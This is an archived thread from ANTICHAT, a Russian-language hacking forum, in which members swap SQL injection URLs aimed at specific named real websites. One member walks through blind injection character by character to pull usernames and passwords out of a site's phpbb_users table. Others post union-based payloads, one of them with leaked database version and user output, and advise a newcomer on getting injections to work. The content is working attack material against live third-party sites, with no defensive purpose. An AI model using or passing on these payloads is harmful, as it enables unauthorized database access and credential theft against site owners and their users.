ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.01.2009, 18:13
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Это ты показал какие ибические конструкции можно делать , или как? Помоему к сайту это не имеет никакого отношения, и он достаточно ясно об этом сообщает
гы, я не спорю, похоже на бред, конечно, но есть разница таки между:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+fp_accomplishments+LIMIT+0,1 ),(select+id+from+fp_accomplishments+LIMIT+1,1),(s elect+id+from+fp_accomplishments+LIMIT+2,1)),1,1)) )=49
и
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=49
насколько я понимаю, так можно брутить сразу по ЦЕЛОМУ названию таблицы, а не посимвольно, т.к. ошибки совершенно разные и однозначно различаемые. Ну ,конечно, данный способ не для 5-ой ветки  ) Но blind-sql-inj есть не только в пятой ветке
Последний раз редактировалось Pashkela; 11.01.2009 в 18:47..
|
|
|
11.01.2009, 18:55
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от Pashkela
гы, я не спорю, похоже на бред, конечно, но есть разница таки между:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+fp_accomplishments+LIMIT+0,1 ),(select+id+from+fp_accomplishments+LIMIT+1,1),(s elect+id+from+fp_accomplishments+LIMIT+2,1)),1,1)) )=49
и
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+id+ from+admin+LIMIT+1,1),(select+id+from+admin+LIMIT+ 2,1)),1,1)))=49
насколько я понимаю, так можно брутить сразу по ЦЕЛОМУ названию таблицы, а не посимвольно, т.к. ошибки совершенно разные и однозначно различаемые
да, в принципе ты прав, но, в concat_ws если у тебя первый запрос вернет error то остальные выполняться не будут, то есть, что я хочу сказать, там есть check6ga_forums.phpbb_users и
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring(CONCAT_WS (0x3a,(select+id+from+admin+LIMIT+0,1),(select+use r_password+from+phpbb_users+LIMIT+1,1),(select+use r_password+from+phpbb_users+LIMIT+1,1)),1,1)))=97
нам будет возврашено
Table 'check6ga_forums.admin' doesn't exist,
потому как первый запрос в concat_ws вернул error остальные запросы в concat_ws не выполнились, поэтому использования 3 запросов в concat_ws без смыслено.
Последний раз редактировалось AkyHa_MaTaTa; 11.01.2009 в 18:58..
|
|
|
|
11.01.2009, 19:15
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
не могу не согласиться, туплю чото сегодня по черному. +
проверка:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+i d+from+admin),1,1)))=49
найденная таблица (и уже случайно колонка):
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+i d+from+phpbb_users),1,1)))=49
брут колонок из phpbb_users :
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u ser+from+phpbb_users),1,1)))=49
сбрутилась еще одна:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users),1,1)))=49
ну в общем стандартные колонки из форума phpbb, значит есть поле и user_password:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u ser_password+from+phpbb_users),1,1)))=49
Далее понятно
но все таки напишу:
ищем ник 1 пользователя в базе:
проверяем на 1-ую буковку 'a':
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),1,1)))=97
угадали, отлично, проверяем вторую букву далее по алфавиту:
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),2,1)))=98
не подходит, и так дошлепали до 110, буква 'n':
http://www.check6gaming.com/news.php?id=67+AND+ascii(lower(substring((select+u sername+from+phpbb_users+limit+0,1),2,1)))=110
на всякий случай проверяем нашу догадку:
http://www.check6gaming.com/news.php?id=67+AND+substring((select+username+from +phpbb_users+limit+0,1),1,2)='an'
значит всё верно. И так бомбим до победного конца. Тоже самое с user_password
Последний раз редактировалось Pashkela; 11.01.2009 в 20:10..
|
|
|
|
11.01.2009, 21:06
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
2 wildshaman:
ещё слепые inj:
Код:
http://www.trunov.com/content.php?act=showcat&id=11+and+substring(@@version,1,1)=4
Код:
http://www.sisterstates.com/statetaxforms.php?id=11+and+substring(@@version,1,1)=4
версия мускула = 4
Последний раз редактировалось z00MAN; 11.01.2009 в 21:10..
|
|
|
|
11.01.2009, 21:17
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от z00MAN
2 wildshaman:
ещё слепые inj:
Код:
http://www.trunov.com/content.php?act=showcat&id=11+and+substring(@@version,1,1)=4
Код:
http://www.sisterstates.com/statetaxforms.php?id=11+and+substring(@@version,1,1)=4
версия мускула = 4 спасиб, а то я новичок в этом деле, еще не все понятно)
|
|
|
|
11.01.2009, 23:16
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
http://www.reciprodate.com/home.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,concat_ws(0x7c,version(),user(),da tabase()),22,23,24,25/*
4.0.27-standard|reciprodate@localhost|reciprodate
|
|
|
|
12.01.2009, 03:11
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
Мужики, а что можна с такой ошибкой сделать?
http://news.qs.kiev.ua/lenta/s.php?s=1'
|
|
|
|
12.01.2009, 04:41
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
тут вроде фильтрация стоит у меня ничё не прошло...
|
|
|
|
12.01.2009, 08:05
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
Провел на форуме:
103485
Репутация:
4
|
|
А такой вопрос.
Сайт в локалке у нас...есть скуль
Код:
http://megaload.megalan.tv/program.php?id=3613%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--
отображает просто исходную страницу. количество полей подобрал по ошибкам, не версию, не бд не показывает. версия сто пудов 5ххх |
|
|
|
12.01.2009, 08:30
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от vakula
А такой вопрос.
Сайт в локалке у нас...есть скуль
Код:
http://megaload.megalan.tv/program.php?id=3613%20union%20select%201,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--
отображает просто исходную страницу. количество полей подобрал по ошибкам, не версию, не бд не показывает. версия сто пудов 5ххх 1. Попробуй:
Код:
http://megaload.megalan.tv/program.php?id=-3613+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
2. Возможно, там просто нету вывода.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид